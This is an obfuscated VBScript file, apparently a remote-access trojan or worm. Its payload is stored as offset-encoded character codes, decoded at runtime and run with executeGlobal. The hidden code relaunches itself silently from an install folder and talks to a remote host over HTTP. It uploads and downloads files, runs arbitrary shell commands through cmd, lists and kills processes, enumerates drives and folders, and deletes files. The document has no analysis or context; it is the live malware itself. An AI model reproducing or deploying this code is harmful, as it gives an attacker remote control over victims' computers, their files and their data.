188$@185$@187$@174$@170$@173$@178$@183$@176$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@105$@105$@105$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@175$@170$@181$@188$@174$@105$@118$@105$@107$@105$@111$@105$@173$@170$@189$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@105$@111$@105$@107$@165$@107$@117$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@86$@83$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@86$@83$@86$@83$@86$@83$@190$@185$@188$@189$@170$@187$@189$@86$@83$@188$@174$@189$@105$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@114$@86$@83$@188$@174$@189$@105$@178$@183$@188$@189$@170$@181$@181$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@86$@83$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@114$@105$@133$@135$@105$@181$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@114$@105$@189$@177$@174$@183$@105$@86$@83$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@140$@177$@187$@113$@124$@125$@114$@86$@83$@105$@105$@105$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@105$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@187$@187$@119$@172$@181$@174$@170$@187$@86$@83$@188$@174$@189$@105$@184$@183$@174$@184$@183$@172$@174$@105$@134$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@184$@185$@174$@183$@189$@174$@193$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@129$@117$@105$@175$@170$@181$@188$@174$@114$@86$@83$@178$@175$@105$@105$@174$@187$@187$@119$@183$@190$@182$@171$@174$@187$@105$@135$@105$@121$@105$@189$@177$@174$@183$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@188$@178$@189$@174$@173$@184$@192$@183$@181$@184$@170$@173$@174$@187$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@175$@178$@181$@174$@183$@170$@182$@174$@114$@86$@83$@86$@83$@188$@189$@187$@181$@178$@183$@180$@105$@134$@105$@175$@178$@181$@174$@190$@187$@181$@86$@83$@188$@189$@187$@188$@170$@191$@174$@189$@184$@105$@134$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@188$@174$@189$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@105$@114$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@184$@185$@174$@183$@105$@107$@176$@174$@189$@107$@117$@105$@188$@189$@187$@181$@178$@183$@180$@117$@105$@175$@170$@181$@188$@174$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@174$@183$@173$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@105$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@178$@175$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@105$@86$@83$@178$@175$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@189$@170$@189$@190$@188$@105$@134$@105$@123$@121$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@173$@178$@182$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@105$@105$@105$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@105$@105$@105$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@82$@82$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@82$@82$@119$@184$@185$@174$@183$@86$@83$@82$@82$@119$@192$@187$@178$@189$@174$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@187$@174$@188$@185$@184$@183$@188$@174$@171$@184$@173$@194$@86$@83$@82$@82$@119$@188$@170$@191$@174$@189$@184$@175$@178$@181$@174$@105$@188$@189$@187$@188$@170$@191$@174$@189$@184$@86$@83$@82$@82$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@105$@105$@105$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@86$@83$@174$@183$@173$@105$@178$@175$@105$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@173$@184$@192$@183$@181$@184$@170$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@175$@178$@181$@174$@173$@178$@187$@114$@86$@83$@86$@83$@178$@175$@105$@175$@178$@181$@174$@173$@178$@187$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@105$@86$@83$@105$@105$@105$@175$@178$@181$@174$@173$@178$@187$@105$@134$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@86$@83$@188$@189$@187$@188$@170$@191$@174$@189$@184$@105$@134$@105$@175$@178$@181$@174$@173$@178$@187$@105$@111$@105$@182$@178$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@105$@178$@183$@188$@189$@187$@187$@174$@191$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@107$@165$@107$@114$@105$@116$@105$@122$@114$@86$@83$@188$@174$@189$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@107$@178$@188$@118$@188$@174$@183$@173$@178$@183$@176$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@111$@105$@175$@178$@181$@174$@190$@187$@181$@117$@105$@175$@170$@181$@188$@174$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@174$@183$@173$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@86$@83$@188$@174$@189$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@105$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@178$@175$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@189$@170$@189$@190$@188$@105$@134$@105$@123$@121$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@173$@178$@182$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@82$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@105$@105$@105$@105$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@86$@83$@82$@82$@105$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@82$@82$@105$@119$@184$@185$@174$@183$@86$@83$@82$@82$@105$@119$@192$@187$@178$@189$@174$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@187$@174$@188$@185$@184$@183$@188$@174$@171$@184$@173$@194$@86$@83$@82$@82$@105$@119$@188$@170$@191$@174$@189$@184$@175$@178$@181$@174$@105$@188$@189$@187$@188$@170$@191$@174$@189$@184$@86$@83$@82$@82$@105$@119$@172$@181$@184$@188$@174$@86$@83$@82$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@86$@83$@174$@183$@173$@105$@178$@175$@105$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@190$@185$@181$@184$@170$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@114$@86$@83$@86$@83$@173$@178$@182$@105$@105$@177$@189$@189$@185$@184$@171$@179$@117$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@117$@171$@190$@175$@175$@174$@187$@86$@83$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@105$@86$@83$@105$@105$@105$@105$@105$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@105$@105$@105$@105$@105$@119$@184$@185$@174$@183$@86$@83$@82$@105$@119$@181$@184$@170$@173$@175$@187$@184$@182$@175$@178$@181$@174$@105$@175$@178$@181$@174$@190$@187$@181$@86$@83$@82$@105$@171$@190$@175$@175$@174$@187$@105$@134$@105$@119$@187$@174$@170$@173$@86$@83$@82$@105$@119$@172$@181$@184$@188$@174$@86$@83$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@188$@174$@189$@105$@177$@189$@189$@185$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@107$@178$@188$@118$@187$@174$@172$@191$@178$@183$@176$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@111$@105$@175$@178$@181$@174$@190$@187$@181$@117$@105$@175$@170$@181$@188$@174$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@188$@174$@183$@173$@105$@171$@190$@175$@175$@174$@187$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@113$@114$@86$@83$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@173$@187$@178$@191$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@187$@178$@191$@174$@188$@86$@83$@178$@175$@105$@105$@105$@173$@187$@178$@191$@174$@119$@178$@188$@187$@174$@170$@173$@194$@105$@134$@105$@189$@187$@190$@174$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@134$@105$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@111$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@197$@107$@105$@111$@105$@173$@187$@178$@191$@174$@119$@173$@187$@178$@191$@174$@189$@194$@185$@174$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@143$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@174$@183$@190$@182$@175$@170$@175$@105$@113$@174$@183$@190$@182$@173$@178$@187$@114$@86$@83$@86$@83$@174$@183$@190$@182$@175$@170$@175$@105$@134$@105$@174$@183$@190$@182$@173$@178$@187$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@175$@184$@181$@173$@174$@187$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@105$@113$@174$@183$@190$@182$@173$@178$@187$@114$@119$@188$@190$@171$@175$@184$@181$@173$@174$@187$@188$@86$@83$@105$@105$@105$@105$@105$@174$@183$@190$@182$@175$@170$@175$@105$@134$@105$@174$@183$@190$@182$@175$@170$@175$@105$@111$@105$@175$@184$@181$@173$@174$@187$@119$@183$@170$@182$@174$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@173$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@175$@184$@181$@173$@174$@187$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@183$@174$@193$@189$@86$@83$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@175$@178$@181$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@105$@113$@174$@183$@190$@182$@173$@178$@187$@114$@119$@175$@178$@181$@174$@188$@86$@83$@105$@105$@105$@105$@105$@174$@183$@190$@182$@175$@170$@175$@105$@134$@105$@174$@183$@190$@182$@175$@170$@175$@105$@111$@105$@175$@178$@181$@174$@119$@183$@170$@182$@174$@105$@111$@105$@107$@197$@107$@105$@111$@105$@175$@178$@181$@174$@119$@188$@178$@195$@174$@105$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@175$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@175$@178$@181$@174$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@113$@114$@86$@83$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@172$@184$@181$@178$@189$@174$@182$@188$@105$@134$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@185$@187$@184$@172$@174$@188$@188$@107$@117$@117$@125$@129$@114$@86$@83$@86$@83$@173$@178$@182$@105$@184$@171$@179$@178$@189$@174$@182$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@178$@189$@174$@182$@105$@178$@183$@105$@172$@184$@181$@178$@189$@174$@182$@188$@86$@83$@82$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@134$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@111$@105$@184$@171$@179$@178$@189$@174$@182$@119$@183$@170$@182$@174$@105$@111$@105$@107$@197$@107$@86$@83$@82$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@134$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@111$@105$@184$@171$@179$@178$@189$@174$@182$@119$@185$@187$@184$@172$@174$@188$@188$@178$@173$@105$@111$@105$@107$@197$@107$@86$@83$@105$@105$@105$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@134$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@111$@105$@184$@171$@179$@178$@189$@174$@182$@119$@174$@193$@174$@172$@190$@189$@170$@171$@181$@174$@185$@170$@189$@177$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@188$@190$@171$@105$@174$@193$@178$@189$@185$@187$@184$@172$@174$@188$@188$@105$@113$@185$@178$@173$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@189$@170$@188$@180$@180$@178$@181$@181$@105$@120$@143$@105$@120$@157$@105$@120$@153$@146$@141$@105$@107$@105$@111$@105$@185$@178$@173$@117$@128$@117$@189$@187$@190$@174$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@173$@174$@181$@174$@189$@174$@175$@170$@175$@105$@113$@190$@187$@181$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@190$@187$@181$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@184$@181$@173$@174$@187$@105$@190$@187$@181$@86$@83$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@172$@182$@173$@188$@177$@174$@181$@181$@105$@113$@172$@182$@173$@114$@86$@83$@86$@83$@173$@178$@182$@105$@177$@189$@189$@185$@184$@171$@179$@117$@184$@174$@193$@174$@172$@117$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@86$@83$@86$@83$@188$@174$@189$@105$@184$@174$@193$@174$@172$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@174$@172$@105$@113$@107$@110$@172$@184$@182$@188$@185$@174$@172$@110$@105$@120$@172$@105$@107$@105$@111$@105$@172$@182$@173$@114$@86$@83$@178$@175$@105$@183$@184$@189$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@184$@190$@189$@119$@170$@189$@174$@183$@173$@184$@175$@188$@189$@187$@174$@170$@182$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@105$@134$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@184$@190$@189$@119$@187$@174$@170$@173$@170$@181$@181$@86$@83$@174$@181$@188$@174$@178$@175$@105$@183$@184$@189$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@174$@187$@187$@119$@170$@189$@174$@183$@173$@184$@175$@188$@189$@187$@174$@170$@182$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@105$@134$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@174$@187$@187$@119$@187$@174$@170$@173$@170$@181$@181$@86$@83$@174$@181$@188$@174$@105$@86$@83$@105$@105$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@105$@134$@105$@107$@107$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@86$@83$@172$@182$@173$@188$@177$@174$@181$@181$@105$@134$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@"
dim mfvasRGZIhZnddvphsOWz
mfvasRGZIhZnddvphsOWz = "$@"
mfvasRGZIhZnddvphsOW=SPLIT(mfvasRGZIhZnddvphsOW, mfvasRGZIhZnddvphsOWz)
dim FOFwEQObHcOMduGpSoigGY
FOFwEQObHcOMduGpSoigGY = 0
dim FOFwEQObHcOMduGpSoigGYv
FOFwEQObHcOMduGpSoigGYv = UBOUND(mfvasRGZIhZnddvphsOW) - 1
FOR FOFwEQObHcOMduGpSoigGYvX = FOFwEQObHcOMduGpSoigGY TO FOFwEQObHcOMduGpSoigGYv
Dim FOFwEQObHcOMduGpSoigGYvXJ
Dim FOFwEQObHcOMduGpSoigGYvXJZN
Dim FOFwEQObHcOMduGpSoigGYvXJZNx
Dim FOFwEQObHcOMduGpSoigGYvXJZNxD
FOFwEQObHcOMduGpSoigGYvXJZNxD = mfvasRGZIhZnddvphsOW(FOFwEQObHcOMduGpSoigGYvX)
FOFwEQObHcOMduGpSoigGYvXJZN = "mfvasRGZIhZ"
FOFwEQObHcOMduGpSoigGYvXJZNx = 11
FOFwEQObHcOMduGpSoigGYvXJ = FOFwEQObHcOMduGpSoigGYvXJZNxDE(chr(FOFwEQObHcOMduGpSoigGYvXJZNxD) , FOFwEQObHcOMduGpSoigGYvXJZN, FOFwEQObHcOMduGpSoigGYvXJZNx)
FOFwEQObHcOMduGpSoigGYvXJZ = FOFwEQObHcOMduGpSoigGYvXJZ & FOFwEQObHcOMduGpSoigGYvXJ
NEXT
executeGlobal (FOFwEQObHcOMduGpSoigGYvXJZ)
Function FOFwEQObHcOMduGpSoigGYvXJZNxDEi( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL)
FOFwEQObHcOMduGpSoigGYvXJZNxDEiX = Array()
ReDim FOFwEQObHcOMduGpSoigGYvXJZNxDEiX( CInt( Len( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL ) ) )
For FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO = 0 to Len(FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL) - 1
FOFwEQObHcOMduGpSoigGYvXJZNxDEiX( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO ) = Asc( Mid( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL,FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO + 1 ,1 ) )
Next
FOFwEQObHcOMduGpSoigGYvXJZNxDEi = FOFwEQObHcOMduGpSoigGYvXJZNxDEiX
End Function
